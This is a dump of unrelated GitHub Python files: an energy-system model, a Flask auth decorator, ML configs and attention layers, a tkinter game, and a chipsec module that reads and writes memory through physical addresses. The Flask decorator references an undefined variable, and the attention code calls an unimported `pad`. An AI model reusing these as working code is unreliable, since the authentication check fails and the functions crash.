--------------------\nif add_storage:\n n.add(\"Store\",\n \"Island_store\",\n bus = bus_df.loc['Energy Island']['Bus name'], # Add to island bus\n carrier = \"Store1\",\n e_nom_extendable = True,\n e_cyclic = True,\n capital_cost = tech_df['capital cost']['storage'],\n marginal_cost = tech_df['marginal cost']['storage']\n )\n\n# ----- Add hydrogen production --------------------\n#Add \"loads\" in the form of negative generators\nif add_hydrogen:\n n.add(\"Generator\",\n \"P2X\",\n bus = bus_df.loc['Energy Island']['Bus name'], # Add to island bus\n carrier = \"P2X\",\n p_nom_extendable = True,\n p_max_pu = 0,\n p_min_pu = -1,\n capital_cost = tech_df['capital cost']['hydrogen'],\n marginal_cost = tech_df['marginal cost']['hydrogen'],\n )\n\n# ----- Add datacenter --------------------\nif add_data:\n n.add(\"Generator\",\n \"Data\",\n bus = bus_df.loc['Energy Island']['Bus name'], # Add to island bus\n carrier = \"Data\",\n p_nom_extendable = True,\n p_max_pu = -0.99,\n p_min_pu = -1,\n capital_cost = tech_df['capital cost']['datacenter'],\n marginal_cost = tech_df['marginal cost']['datacenter'] ,\n )\n\n#%% Extra functionality\ndef area_constraint(n, snapshots):\n \n # Get variables for all generators and store\n vars_gen = get_var(n, 'Generator', 'p_nom')\n vars_store = get_var(n, 'Store', 'e_nom')\n \n # Apply area use on variable and create linear expression \n lhs = linexpr((n.area_use['hydrogen'], vars_gen[\"P2X\"]), \n (n.area_use['data'], vars_gen[\"Data\"]), \n (n.area_use['storage'], vars_store['Island_store']))\n \n # Define area use limit\n rhs = n.total_area #[m^2]\n \n # Define constraint\n define_constraints(n, lhs, '<=', rhs, 'Island', 'Area_Use')\n \ndef link_constraint(n, snapshots):\n # Get main links \n link_names = n.main_links # List of main link names\n link_t = n.link_total_max # Maximum total link capacity\n link_min = n.link_p_nom_min # Minimum link capacity\n link_t_min = link_min * len(link_names) # Minimum total link capacity\n \n # get all link variables, and then get only main link variables\n vars_links = get_var(n, 'Link', 'p_nom')\n vars_links = vars_links[link_names]\n \n # Sum up link capacities of chosen links (lhs), and set limit (rhs)\n rhs = link_t if link_t >= link_t_min else link_t_min\n lhs = join_exprs(linexpr((1, vars_links)))\n \n #Define constraint and name it 'Total constraint'\n define_constraints(n, lhs, '=', rhs, 'Link', 'Total constraint')\n\ndef extra_functionalities(n, snapshots):\n area_constraint(n, snapshots)\n link_constraint(n, snapshots)\n\n#%% Solve\nif should_solve:\n n.lopf(pyomo = False,\n solver_name = 'gurobi',\n keep_shadowprices = True,\n keep_references = True,\n extra_functionality = extra_functionalities,\n )\nelse:\n pass\n \n#%% Plot\n\nip.set_plot_options()\n\nif should_plot:\n ip.plot_geomap(n)\n\nif should_n_diagram:\n \n pos = [\n [0, 0], #Island\n [20, -1], #Denmark\n [15, 8], #Norway\n [18, -10], #DE\n [6, -11], #NE\n [-4, -12], #BE\n [-10, 1], #UK\n ]\n \n pdiag.draw_network(n, spacing = 1, handle_bi = True, pos = None,\n bus_color = 'azure',\n filename = 'pypsa_diagram_3_2.svg')\n \nif should_bus_diagram:\n pdiag.draw_bus(n, 'Energy Island', bus_color = 'azure',\n handle_bi = True, link_line_length = 1.1,\n filename = 'bus_diagram1.svg')\n \n \n\n\n\n# t2 = pd.date_range('2030-01-01 00:00', '2030-01-07 00:00', freq = 'H')\n# ax = n.generators_t.p['Data'][t2].abs().plot(figsize = (15,5))\n# fig = plt.gcf()\n# ax.set_xlabel('Time [hr]')\n# ax.set_ylabel('Power consumed [MW]')\n# ax.set_title('Data')\n# fig.savefig('Data_timeseries.svg', format = 'svg', bbox_inches='tight')\n\n\n# Extra\n# linkz = n.links_t.p0\n\n# linkz2 = n.links[~n.links.index.str.contains(\"bus\")]\n\n# country = 'Denmark'\n# linkz_country = n.links[n.links.index.str.contains(country)]\n\n# linkz2['p_nom_opt'].hist(bins = 12, figsize = (10,5))\n# linkz2['p_nom_opt'].plot(figsize = (10,5))\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"TheReal-Andrew/Masters_Thesis_NorthSeaEnergyIsland","sub_path":"test/full model test 1/model_test_1.py","file_name":"model_test_1.py","file_ext":"py","file_size_in_byte":10838,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"27735248370","text":"from functools import wraps\nfrom flask import request, jsonify, make_response\nfrom models.user import User\n\n\ndef auth_required(func):\n \"\"\"decorator for authenticating a user using token based authentication \"\"\"\n @wraps(func)\n def decorated_function(*args, **kwargs):\n \"\"\" Decorated function for authenticating a user\"\"\"\n response = {\n 'status': 'Failed',\n 'message': 'Invalid token'\n }\n code = 401\n\n auth_header = request.headers.get('Authorization')\n if not auth_header:\n auth_token = ''\n else:\n auth_token = auth_header.split(\" \")[1]\n subject = User.decode_auth_token(auth_token)\n if not auth_token or isinstance(resp, str):\n return make_response(jsonify(response)), code\n user = {'user_info': subject, 'auth_token': auth_token}\n return func(user, *args, **kwargs)\n return decorated_function\n","repo_name":"inno-asiimwe/questioner-flask","sub_path":"utils/users.py","file_name":"users.py","file_ext":"py","file_size_in_byte":942,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"41823351428","text":"# inport necessary packages\nimport os\n\n# initialize the path to the *original* input directory of images\nORIG_INPUT_DATASET = \"training_images\"\n\nTRAIN_LABEL_PATH = \"training_labels.txt\"\n\n# initialize the base path to the *new* directory that will contain\n# our images after computing the training and testing split\nBASE_PATH = \"dataset\"\n\n# derive the training, validation, and testing directories\nTRAIN_PATH = os.path.sep.join([BASE_PATH, \"training\"])\nVAL_PATH = os.path.sep.join([BASE_PATH, \"validation\"])\nTEST_PATH = os.path.sep.join([BASE_PATH, \"evaluation\"])\n\n# for getting the order of images to output answer\nSAMPLE_ANSWER_PATH = os.path.sep.join([\"self_utils\", \"sample_answer.txt\"])\n\n# initialize the list of class label names\nCLASSES = []\nCLASS_NAMES_FILE = \"classes.txt\"\nwith open(CLASS_NAMES_FILE, \"r\") as f:\n for line in f:\n line = line[:-1] # remove the trailing \\n\n CLASSES.append(line)\n\n# build class directories for training and validation datasets\nfor split in (TRAIN_PATH, VAL_PATH):\n for labels in CLASSES:\n label_directory = os.path.sep.join([split, labels])\n if not os.path.exists(label_directory):\n print(\"[INFO] creating '{}' directory\".format(label_directory))\n os.makedirs(label_directory)\n\n\n# set the image size and shape\nIMG_SIZE = (480, 480)\nIMG_SHAPE = IMG_SIZE + (3, )\n\n# set the batch size\nBATCH_SIZE = 32\n\n# initialize our number of epochs, initial learning rate\nNUM_EPOCHS = 30\nINIT_LR = 1e-3\n\n# set the directory to save our trained model's weight\nWEIGHT_PATH = \"weightings\"\nif not os.path.exists(WEIGHT_PATH):\n print(\"[INFO] creating '{}' directory\".format(WEIGHT_PATH))\n os.makedirs(WEIGHT_PATH)\n\n# the name of base model\nBASE_MODEL_NAME = \"efficientnetv2-m-21k.h5\"\n\n# saving training model\nSAVE_MODEL1 = \"save_model1.h5\"\nSAVE_MODEL2 = \"save_model2.h5\"\n\n# the link and name of the final model .h5 file\nMODEL_URL = \"https://drive.google.com/u/0/uc?id=1-wnA207-0fuqKZMPL1r5lT_w9KqK2oKl&export=download\"\nMODEL_NAME = \"Enet_v2_finetuned_final.h5\"\n\n# file names for training histories\nHISTORY1 = \"history1.json\"\nHISTORY2 = \"history2.json\"\n","repo_name":"Lucas-Kuo/VR_DL_HW1","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2132,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"38665124160","text":"import tkinter as tk\nimport random\n\n# 玩家要猜的数字\nnumber = random.randint(0, 1024)\nrunning = True\n# 猜的次数\nnum = 0\n# 提示猜测范围的最大数\nnmaxn = 1024\n# 提示猜测范围的最小数\nnminn = 0\n\n\n# \"关闭\"按钮事件函数\ndef eBtnClose(event):\n root.destroy()\n\n\n# \"猜\"按钮事件函数\ndef eBtnGuess(event):\n global nmaxn\n global nminn\n global num\n global running\n if running:\n # 获取猜的数字并转化为数字\n val_a = int(entry_a.get())\n if val_a == number:\n labelqval(\"恭喜答对了!\")\n num += 1\n running = False\n numGuess()\n elif val_a < number:\n # 猜小了\n if val_a > nminn:\n # 修改提示猜测范围的最小数\n nminn = val_a\n num += 1\n labelqval(\"小了哦,请输入\" + str(nminn) + \"到\" + str(nmaxn) + \"之间任意整数:\")\n else:\n if val_a < nmaxn:\n # 修改提示猜测范围的最大数\n nmaxn = val_a\n num += 1\n labelqval(\"大了哦,请输入\" + str(nminn) + \"到\" + str(nmaxn) + \"之间任意整数:\")\n else:\n labelqval(\"你已经答对啦。。。\")\n\n\ndef numGuess():\n if num == 1:\n labelqval(\"一次答对!\")\n elif num < 10:\n labelqval(\"==十次以内就答对了牛。。。 尝试次数:\" + str(num))\n else:\n labelqval(\"好吧,您都试了超过10v次了。。。 尝试次数:\" + str(num))\n\n\ndef labelqval(vText):\n # 修改提示标签文字\n label_val_q.config(label_val_q, text=vText)\n\n\nroot = tk.Tk()\nroot.geometry(\"400x90+200+200\")\nlabel_val_q = tk.Label(root, width=\"80\")\nlabel_val_q.pack(side=\"top\")\n\n# 单行输入文本框\nentry_a = tk.Entry(root, width=\"40\")\n# \"猜\"按钮\nbtnGuess = tk.Button(root, text=\"猜\")\nentry_a.pack(side=\"left\")\n# 绑定事件\nentry_a.bind(\"\", eBtnGuess)\nbtnGuess.bind(\"\", eBtnGuess)\nbtnGuess.pack(side=\"left\")\n# ”关闭按钮“\nbtnClose = tk.Button(root, text=\"关闭\")\nbtnClose.bind(\"\", eBtnClose)\nbtnClose.pack(side=\"left\")\nlabelqval(\"请输入0到1024之间的任意整数:\")\nentry_a.focus_set()\nprint(number)\nroot.mainloop()\n","repo_name":"beiyuanqian/python_learning","sub_path":"python_projectcase/1-28.1.py","file_name":"1-28.1.py","file_ext":"py","file_size_in_byte":2277,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"5131108029","text":"import logging\nimport math\nfrom typing import Optional, Tuple\nimport warnings\nimport torch\nfrom collections import defaultdict\nfrom torch import Tensor, nn\nfrom torch.nn import functional as F\nfrom torch.nn.modules import TransformerDecoder as OrgTransformerDecoder\nfrom torch.nn.modules import TransformerDecoderLayer as OrgTransformerDecoderLayer\nfrom torch.nn.modules.activation import MultiheadAttention\nfrom torch.nn.functional import _scaled_dot_product_attention, _in_projection_packed, _in_projection, linear\nfrom torch.overrides import (has_torch_function, handle_torch_function)\n\nlogger = logging.getLogger(__name__)\n\nBOS, EOS, PAD, MASK = '[BOS]', '[EOS]', '[PAD]', '[MASK]'\n\n\ndef multi_head_attention_forward(\n query: Tensor,\n key: Tensor,\n value: Tensor,\n embed_dim_to_check: int,\n num_heads: int,\n in_proj_weight: Tensor,\n in_proj_bias: Optional[Tensor],\n bias_k: Optional[Tensor],\n bias_v: Optional[Tensor],\n add_zero_attn: bool,\n dropout_p: float,\n out_proj_weight: Tensor,\n out_proj_bias: Optional[Tensor],\n training: bool = True,\n key_padding_mask: Optional[Tensor] = None,\n need_weights: bool = True,\n attn_mask: Optional[Tensor] = None,\n use_separate_proj_weight: bool = False,\n q_proj_weight: Optional[Tensor] = None,\n k_proj_weight: Optional[Tensor] = None,\n v_proj_weight: Optional[Tensor] = None,\n static_k: Optional[Tensor] = None,\n static_v: Optional[Tensor] = None,\n) -> Tuple[Tensor, Optional[Tensor]]:\n '''\n Modified from the pytorch source so that it can output the attention weights of multiple heads instead of the average.\n '''\n\n tens_ops = (query, key, value, in_proj_weight, in_proj_bias, bias_k,\n bias_v, out_proj_weight, out_proj_bias)\n if has_torch_function(tens_ops):\n return handle_torch_function(\n multi_head_attention_forward,\n tens_ops,\n query,\n key,\n value,\n embed_dim_to_check,\n num_heads,\n in_proj_weight,\n in_proj_bias,\n bias_k,\n bias_v,\n add_zero_attn,\n dropout_p,\n out_proj_weight,\n out_proj_bias,\n training=training,\n key_padding_mask=key_padding_mask,\n need_weights=need_weights,\n attn_mask=attn_mask,\n use_separate_proj_weight=use_separate_proj_weight,\n q_proj_weight=q_proj_weight,\n k_proj_weight=k_proj_weight,\n v_proj_weight=v_proj_weight,\n static_k=static_k,\n static_v=static_v,\n )\n\n # set up shape vars\n tgt_len, bsz, embed_dim = query.shape\n src_len, _, _ = key.shape\n assert embed_dim == embed_dim_to_check, \\\n f\"was expecting embedding dimension of {embed_dim_to_check}, but got {embed_dim}\"\n if isinstance(embed_dim, torch.Tensor):\n # embed_dim can be a tensor when JIT tracing\n head_dim = embed_dim.div(num_heads, rounding_mode='trunc')\n else:\n head_dim = embed_dim // num_heads\n assert head_dim * \\\n num_heads == embed_dim, f\"embed_dim {embed_dim} not divisible by num_heads {num_heads}\"\n if use_separate_proj_weight:\n # allow MHA to have different embedding dimensions when separate projection weights are used\n assert key.shape[:2] == value.shape[:2], \\\n f\"key's sequence and batch dims {key.shape[:2]} do not match value's {value.shape[:2]}\"\n else:\n assert key.shape == value.shape, f\"key shape {key.shape} does not match value shape {value.shape}\"\n\n #\n # compute in-projection\n #\n if not use_separate_proj_weight:\n q, k, v = _in_projection_packed(query, key, value, in_proj_weight,\n in_proj_bias)\n else:\n assert q_proj_weight is not None, \"use_separate_proj_weight is True but q_proj_weight is None\"\n assert k_proj_weight is not None, \"use_separate_proj_weight is True but k_proj_weight is None\"\n assert v_proj_weight is not None, \"use_separate_proj_weight is True but v_proj_weight is None\"\n if in_proj_bias is None:\n b_q = b_k = b_v = None\n else:\n b_q, b_k, b_v = in_proj_bias.chunk(3)\n q, k, v = _in_projection(query, key, value, q_proj_weight,\n k_proj_weight, v_proj_weight, b_q, b_k, b_v)\n\n # prep attention mask\n if attn_mask is not None:\n if attn_mask.dtype == torch.uint8:\n warnings.warn(\n \"Byte tensor for attn_mask in nn.MultiheadAttention is deprecated. Use bool tensor instead.\"\n )\n attn_mask = attn_mask.to(torch.bool)\n else:\n assert attn_mask.is_floating_point() or attn_mask.dtype == torch.bool, \\\n f\"Only float, byte, and bool types are supported for attn_mask, not {attn_mask.dtype}\"\n # ensure attn_mask's dim is 3\n if attn_mask.dim() == 2:\n correct_2d_size = (tgt_len, src_len)\n if attn_mask.shape != correct_2d_size:\n raise RuntimeError(\n f\"The shape of the 2D attn_mask is {attn_mask.shape}, but should be {correct_2d_size}.\"\n )\n attn_mask = attn_mask.unsqueeze(0)\n elif attn_mask.dim() == 3:\n correct_3d_size = (bsz * num_heads, tgt_len, src_len)\n if attn_mask.shape != correct_3d_size:\n raise RuntimeError(\n f\"The shape of the 3D attn_mask is {attn_mask.shape}, but should be {correct_3d_size}.\"\n )\n else:\n raise RuntimeError(\n f\"attn_mask's dimension {attn_mask.dim()} is not supported\")\n\n # prep key padding mask\n if key_padding_mask is not None and key_padding_mask.dtype == torch.uint8:\n warnings.warn(\n \"Byte tensor for key_padding_mask in nn.MultiheadAttention is deprecated. Use bool tensor instead.\"\n )\n key_padding_mask = key_padding_mask.to(torch.bool)\n\n # add bias along batch dimension (currently second)\n if bias_k is not None and bias_v is not None:\n assert static_k is None, \"bias cannot be added to static key.\"\n assert static_v is None, \"bias cannot be added to static value.\"\n k = torch.cat([k, bias_k.repeat(1, bsz, 1)])\n v = torch.cat([v, bias_v.repeat(1, bsz, 1)])\n if attn_mask is not None:\n attn_mask = pad(attn_mask, (0, 1))\n if key_padding_mask is not None:\n key_padding_mask = pad(key_padding_mask, (0, 1))\n else:\n assert bias_k is None\n assert bias_v is None\n\n #\n # reshape q, k, v for multihead attention and make em batch first\n #\n q = q.contiguous().view(tgt_len, bsz * num_heads, head_dim).transpose(0, 1)\n if static_k is None:\n k = k.contiguous().view(k.shape[0], bsz * num_heads,\n head_dim).transpose(0, 1)\n else:\n # TODO finish disentangling control flow so we don't do in-projections when statics are passed\n assert static_k.size(0) == bsz * num_heads, \\\n f\"expecting static_k.size(0) of {bsz * num_heads}, but got {static_k.size(0)}\"\n assert static_k.size(2) == head_dim, \\\n f\"expecting static_k.size(2) of {head_dim}, but got {static_k.size(2)}\"\n k = static_k\n if static_v is None:\n v = v.contiguous().view(v.shape[0], bsz * num_heads,\n head_dim).transpose(0, 1)\n else:\n # TODO finish disentangling control flow so we don't do in-projections when statics are passed\n assert static_v.size(0) == bsz * num_heads, \\\n f\"expecting static_v.size(0) of {bsz * num_heads}, but got {static_v.size(0)}\"\n assert static_v.size(2) == head_dim, \\\n f\"expecting static_v.size(2) of {head_dim}, but got {static_v.size(2)}\"\n v = static_v\n\n # add zero attention along batch dimension (now first)\n if add_zero_attn:\n zero_attn_shape = (bsz * num_heads, 1, head_dim)\n k = torch.cat(\n [k,\n torch.zeros(zero_attn_shape, dtype=k.dtype, device=k.device)],\n dim=1)\n v = torch.cat(\n [v,\n torch.zeros(zero_attn_shape, dtype=v.dtype, device=v.device)],\n dim=1)\n if attn_mask is not None:\n attn_mask = pad(attn_mask, (0, 1))\n if key_padding_mask is not None:\n key_padding_mask = pad(key_padding_mask, (0, 1))\n\n # update source sequence length after adjustments\n src_len = k.size(1)\n\n # merge key padding and attention masks\n if key_padding_mask is not None:\n assert key_padding_mask.shape == (bsz, src_len), \\\n f\"expecting key_padding_mask shape of {(bsz, src_len)}, but got {key_padding_mask.shape}\"\n key_padding_mask = key_padding_mask.view(bsz, 1, 1, src_len). \\\n expand(-1, num_heads, -1, -1).reshape(bsz * num_heads, 1, src_len)\n if attn_mask is None:\n attn_mask = key_padding_mask\n elif attn_mask.dtype == torch.bool:\n attn_mask = attn_mask.logical_or(key_padding_mask)\n else:\n attn_mask = attn_mask.masked_fill(key_padding_mask, float(\"-inf\"))\n\n # convert mask to float\n if attn_mask is not None and attn_mask.dtype == torch.bool:\n new_attn_mask = torch.zeros_like(attn_mask, dtype=torch.float)\n new_attn_mask.masked_fill_(attn_mask, float(\"-inf\"))\n attn_mask = new_attn_mask\n\n # adjust dropout probability\n if not training:\n dropout_p = 0.0\n\n #\n # (deep breath) calculate attention and out projection\n #\n attn_output, attn_output_weights = _scaled_dot_product_attention(\n q, k, v, attn_mask, dropout_p)\n attn_output = attn_output.transpose(0, 1).contiguous().view(\n tgt_len, bsz, embed_dim)\n attn_output = linear(attn_output, out_proj_weight, out_proj_bias)\n\n if need_weights:\n # output the attention weights for each head.\n attn_output_weights = attn_output_weights.view(bsz, num_heads, tgt_len,\n src_len)\n return attn_output, attn_output_weights\n else:\n return attn_output, None\n\n\nclass MultiheadAttention(MultiheadAttention):\n\n def forward(\n self,\n query: Tensor,\n key: Tensor,\n value: Tensor,\n key_padding_mask: Optional[Tensor] = None,\n need_weights: bool = True,\n attn_mask: Optional[Tensor] = None\n ) -> Tuple[Tensor, Optional[Tensor]]:\n\n if self.batch_first:\n query, key, value = [\n x.transpose(1, 0) for x in (query, key, value)\n ]\n\n if not self._qkv_same_embed_dim:\n attn_output, attn_output_weights = multi_head_attention_forward(\n query,\n key,\n value,\n self.embed_dim,\n self.num_heads,\n self.in_proj_weight,\n self.in_proj_bias,\n self.bias_k,\n self.bias_v,\n self.add_zero_attn,\n self.dropout,\n self.out_proj.weight,\n self.out_proj.bias,\n training=self.training,\n key_padding_mask=key_padding_mask,\n need_weights=need_weights,\n attn_mask=attn_mask,\n use_separate_proj_weight=True,\n q_proj_weight=self.q_proj_weight,\n k_proj_weight=self.k_proj_weight,\n v_proj_weight=self.v_proj_weight)\n else:\n attn_output, attn_output_weights = multi_head_attention_forward(\n query,\n key,\n value,\n self.embed_dim,\n self.num_heads,\n self.in_proj_weight,\n self.in_proj_bias,\n self.bias_k,\n self.bias_v,\n self.add_zero_attn,\n self.dropout,\n self.out_proj.weight,\n self.out_proj.bias,\n training=self.training,\n key_padding_mask=key_padding_mask,\n need_weights=need_weights,\n attn_mask=attn_mask)\n if self.batch_first:\n return attn_output.transpose(1, 0), attn_output_weights\n else:\n return attn_output, attn_output_weights\n\n\nclass TransformerDecoderLayer(OrgTransformerDecoderLayer):\n\n def __init__(self,\n d_model,\n nhead,\n dim_feedforward=2048,\n dropout=0.1,\n activation=F.relu,\n layer_norm_eps=0.00001,\n batch_first=False,\n norm_first=False,\n device=None,\n dtype=None,\n output_attention=False) -> None:\n\n self.output_attention = output_attention\n # self.attention_weights = []\n factory_kwargs = {'device': device, 'dtype': dtype}\n super().__init__(d_model, nhead, dim_feedforward, dropout, activation,\n layer_norm_eps, batch_first, norm_first, device,\n dtype)\n self.multihead_attn = MultiheadAttention(d_model,\n nhead,\n dropout=dropout,\n batch_first=batch_first,\n **factory_kwargs)\n self.self_attn = MultiheadAttention(d_model,\n nhead,\n dropout=dropout,\n batch_first=batch_first,\n **factory_kwargs)\n\n def forward(self,\n tgt: Tensor,\n memory: Tensor,\n tgt_mask: Optional[Tensor] = None,\n memory_mask: Optional[Tensor] = None,\n tgt_key_padding_mask: Optional[Tensor] = None,\n memory_key_padding_mask: Optional[Tensor] = None) -> Tensor:\n\n x = tgt\n if self.norm_first:\n sa_block_x, sa_block_attention = self._sa_block(self.norm1(x), tgt_mask,\n tgt_key_padding_mask)\n x = x + sa_block_x\n mha_block_x, mha_block_attention = self._mha_block(\n self.norm2(x), memory, memory_mask, memory_key_padding_mask)\n # x = x + self._mha_block(self.norm2(x), memory, memory_mask, memory_key_padding_mask)\n x = x + mha_block_x\n x = x + self._ff_block(self.norm3(x))\n else:\n sa_block_x, sa_block_attention = self._sa_block(x, tgt_mask, tgt_key_padding_mask)\n x = self.norm1(x + sa_block_x)\n mha_block_x, mha_block_attention = self._mha_block(\n x, memory, memory_mask, memory_key_padding_mask)\n # x = self.norm2(x + self._mha_block(x, memory, memory_mask, memory_key_padding_mask))\n x = self.norm2(x + mha_block_x)\n x = self.norm3(x + self._ff_block(x))\n\n return x, {'cross_attn':mha_block_attention, 'decoder_self_attn': sa_block_attention}\n \n # self-attention block\n def _sa_block(self, x: Tensor,\n attn_mask: Optional[Tensor], key_padding_mask: Optional[Tensor]) -> Tensor:\n x, attention_weight = self.self_attn(x, x, x,\n attn_mask=attn_mask,\n key_padding_mask=key_padding_mask,\n need_weights=self.output_attention)\n return self.dropout1(x), attention_weight\n\n # multihead attention block\n def _mha_block(self, x: Tensor, mem: Tensor, attn_mask: Optional[Tensor],\n key_padding_mask: Optional[Tensor]) -> Tensor:\n x, attention_weight = self.multihead_attn(\n x,\n mem,\n mem,\n attn_mask=attn_mask,\n key_padding_mask=key_padding_mask,\n need_weights=self.output_attention)\n\n return self.dropout2(x), attention_weight\n\n\nclass TransformerDecoder(OrgTransformerDecoder):\n\n def __init__(self,\n decoder_layer,\n num_layers,\n norm=None,\n output_attention=False):\n self.output_attention = output_attention\n super().__init__(decoder_layer, num_layers, norm)\n\n def forward(self,\n tgt: Tensor,\n memory: Tensor,\n tgt_mask: Optional[Tensor] = None,\n memory_mask: Optional[Tensor] = None,\n tgt_key_padding_mask: Optional[Tensor] = None,\n memory_key_padding_mask: Optional[Tensor] = None) -> Tensor:\n\n output = tgt\n self.attention_weights = defaultdict(list)\n\n for mod in self.layers:\n output, attn_dict = mod(\n output,\n memory,\n tgt_mask=tgt_mask,\n memory_mask=memory_mask,\n tgt_key_padding_mask=tgt_key_padding_mask,\n memory_key_padding_mask=memory_key_padding_mask)\n if self.output_attention:\n for key in attn_dict:\n self.attention_weights[key].append(attn_dict[key])\n\n if self.norm is not None:\n output = self.norm(output)\n if self.output_attention:\n return output, self.attention_weights\n else:\n return output, None\n\n\nclass PositionalEncoding(nn.Module):\n\n def __init__(self, emb_size: int, dropout: float, maxlen: int = 5000):\n super(PositionalEncoding, self).__init__()\n den = torch.exp(-torch.arange(0, emb_size, 2) * math.log(10000) /\n emb_size)\n pos = torch.arange(0, maxlen).reshape(maxlen, 1)\n pos_embedding = torch.zeros((maxlen, emb_size))\n pos_embedding[:, 0::2] = torch.sin(pos * den)\n pos_embedding[:, 1::2] = torch.cos(pos * den)\n pos_embedding = pos_embedding.unsqueeze(-2)\n\n self.dropout = nn.Dropout(dropout)\n self.register_buffer('pos_embedding', pos_embedding)\n\n def forward(self, token_embedding: Tensor):\n return self.dropout(token_embedding +\n self.pos_embedding[:token_embedding.size(0), :])\n\n\n# helper Module to convert tensor of input indices into corresponding tensor of token embeddings\n\n\nclass TokenEmbedding(nn.Module):\n\n def __init__(self, vocab_size: int, emb_size):\n super(TokenEmbedding, self).__init__()\n self.embedding = nn.Embedding(vocab_size, emb_size)\n self.emb_size = emb_size\n\n def forward(self, tokens: Tensor):\n return self.embedding(tokens.long()) * math.sqrt(self.emb_size)\n","repo_name":"wangxr0526/Parrot","sub_path":"models/model_layer.py","file_name":"model_layer.py","file_ext":"py","file_size_in_byte":18856,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"19"} +{"seq_id":"2085428162","text":"import struct\nfrom typing import Tuple\nfrom chipsec.logger import logger, print_buffer_bytes\nfrom chipsec.hal import hal_base\n\n\nclass VirtMemory(hal_base.HALBase):\n def __init__(self, cs):\n super(VirtMemory, self).__init__(cs)\n self.helper = cs.helper\n\n ####################################################################################\n #\n # virtual memory API using 64b virtual Address\n # (Same functions as below just using 64b PA instead of High and Low 32b parts of PA)\n #\n ####################################################################################\n\n # Reading virtual memory\n\n def read_virtual_mem(self, virt_address: int, length: int) -> int:\n logger().log_hal(f'[mem] 0x{virt_address:016X}')\n phys_address = self.va2pa(virt_address)\n return self.helper.read_phys_mem(phys_address, length)\n\n def read_virtual_mem_dword(self, virt_address: int) -> int:\n phys_address = self.va2pa(virt_address)\n out_buf = self.helper.read_phys_mem(phys_address, 4)\n value = struct.unpack('=I', out_buf)[0]\n logger().log_hal(f'[mem] dword at VA = 0x{virt_address:016X}: 0x{value:08X}')\n return value\n\n def read_virtual_mem_word(self, virt_address: int) -> int:\n phys_address = self.va2pa(virt_address)\n out_buf = self.helper.read_phys_mem(phys_address, 2)\n value = struct.unpack('=H', out_buf)[0]\n logger().log_hal(f'[mem] word at VA = 0x{virt_address:016X}: 0x{value:04X}')\n return value\n\n def read_virtual_mem_byte(self, virt_address: int) -> int:\n phys_address = self.va2pa(virt_address)\n out_buf = self.helper.read_phys_mem(phys_address, 1)\n value = struct.unpack('=B', out_buf)[0]\n logger().log_hal(f'[mem] byte at VA = 0x{virt_address:016X}: 0x{value:02X}')\n return value\n\n # Writing virtual memory\n\n def write_virtual_mem(self, virt_address: int, length: int, buf: bytes) -> int:\n logger().log_hal(f'[mem] buffer len = 0x{length:X} to VA = 0x{virt_address:016X}')\n if logger().HAL:\n print_buffer_bytes(buf)\n phys_address = self.va2pa(virt_address)\n return self.helper.write_phys_mem(phys_address, length, buf)\n\n def write_virtual_mem_dword(self, virt_address: int, dword_value: int) -> int:\n logger().log_hal(f'[mem] dword to VA = 0x{virt_address:016X} <- 0x{dword_value:08X}')\n phys_address = self.va2pa(virt_address)\n return self.helper.write_phys_mem(phys_address, 4, struct.pack('I', dword_value))\n\n def write_virtual_mem_word(self, virt_address: int, word_value: int) -> int:\n logger().log_hal(f'[mem] word to VA = 0x{virt_address:016X} <- 0x{word_value:04X}')\n phys_address = self.va2pa(virt_address)\n return self.helper.write_phys_mem(phys_address, 2, struct.pack('H', word_value))\n\n def write_virtual_mem_byte(self, virt_address: int, byte_value: int) -> int:\n logger().log_hal(f'[mem] byte to VA = 0x{virt_address:016X} <- 0x{byte_value:02X}')\n phys_address = self.va2pa(virt_address)\n return self.helper.write_phys_mem(phys_address, 1, struct.pack('B', byte_value))\n\n # Allocate virtual memory buffer\n\n def alloc_virtual_mem(self, length: int, max_phys_address: int = 0xFFFFFFFFFFFFFFFF) -> Tuple[int, int]:\n (va, pa) = self.helper.alloc_phys_mem(length, max_phys_address)\n logger().log_hal(f'[mem] Allocated: PA = 0x{pa:016X}, VA = 0x{va:016X}')\n return (va, pa)\n\n def va2pa(self, va: int) -> int:\n (pa, error_code) = self.helper.va2pa(va)\n if error_code:\n logger().log_hal(f'[mem] Looks like VA (0x{va:016X}) not mapped')\n return va\n logger().log_hal(f'[mem] VA (0x{va:016X}) -> PA (0x{pa:016X})')\n return pa\n\n def free_virtual_mem(self, virt_address: int) -> bool:\n pa = self.va2pa(virt_address)\n ret = self.helper.free_phys_mem(pa)\n logger().log_hal(f'[mem] Deallocated : VA = 0x{virt_address:016X}')\n return ret == 1\n","repo_name":"chipsec/chipsec","sub_path":"chipsec/hal/virtmem.py","file_name":"virtmem.py","file_ext":"py","file_size_in_byte":4043,"program_lang":"python","lang":"en","doc_type":"code","stars":2755,"dataset":"github-code","pt":"19"} +{"seq_id":"19699989397","text":"from sklearn.base import BaseEstimator\nfrom sklearn.preprocessing import StandardScaler\n\nimport torch\n\n\n@torch.jit.script\ndef cdist(x: torch.Tensor, y: torch.Tensor) -> torch.Tensor:\n \"\"\"\n euclidean distance matrix\n -------------------\n equivalent to:\n from scipy.spatial.distance import cdist\n cdist(X, X, 'euclidean')\n \"\"\"\n return torch.cdist(x, y, p=2.0, compute_mode=\"use_mm_for_euclid_dist\")\n\n\n@torch.jit.script\ndef linear_kernel(\n x: torch.Tensor,\n y: torch.Tensor,\n epsilon: float,\n) -> torch.Tensor:\n D_ij = cdist(x, y)\n return D_ij\n\n\n@torch.jit.script\ndef gaussian_kernel(\n x: torch.Tensor,\n y: torch.Tensor,\n epsilon: float,\n) -> torch.Tensor:\n D_ij = cdist(x, y)\n return torch.exp(-D_ij / (2 * epsilon ** 2))\n\n\nclass Nyx(BaseEstimator):\n \"\"\"\n Torch accelerated scikit-learn friendly RBF interpolation\n \"\"\"\n\n def __init__(\n self,\n x_scaler=StandardScaler(),\n y_scaler=StandardScaler(),\n 